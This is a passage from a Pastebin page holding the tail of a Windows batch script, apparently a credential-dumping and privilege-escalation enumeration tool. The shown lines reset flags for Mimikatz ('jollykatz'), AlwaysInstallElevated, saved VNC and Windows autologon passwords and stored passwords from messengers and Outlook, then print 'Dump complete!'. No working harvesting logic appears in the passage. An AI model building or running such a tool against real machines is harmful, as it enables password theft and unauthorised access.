set jollykatz=

621
set accesschk=

622
set OSbit=

623
set whoami=

624
set runningelevatedprompt=

625
set netshfirewall=

626
set OSVersion=

627
set alwaysinstallelevated=

628
set realvncpassfound=

629
set tightvncpassfound1=

630
set tightvncpassfound2=

631
set tigervncpassfound=

632
set vnc3passfound1=

633
set vnc3passfound2=

634
set vnc3passfound3=

635
set winautologinpassfound=

636
set winautologindomainfound=

637
set winautologinuserfound=

638
set defaultloginpass=

639
set IE6found=

640
set IE7found=

641
set AIM6found=

642
set AIMPROfound=

643
set BEYLUXEfound=

644
set BIGANTfound=

645
set CAMFROGfound=

646
set GOOGLETALKfound=

647
set IMVUfound=

648
set NIMBUZZfound=

649
set PALTALKfound=

650
set YAHOOPAGERfound=

651
set INCREDIMAILfound=

652
set OUTLOOK2013found=

653
set OUTLOOK2010POSTNTfound=

654
set OUTLOOK2010PRENTfound=

655
set OUTLOOK98MAILONLYfound=

656
set OUTLOOK98NORMALfound=

657
goto:eof

658
659
:end

660
echo.

661
echo.==============

662
echo.Dump complete!

663
echo.==============

664
GOTO:eof
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!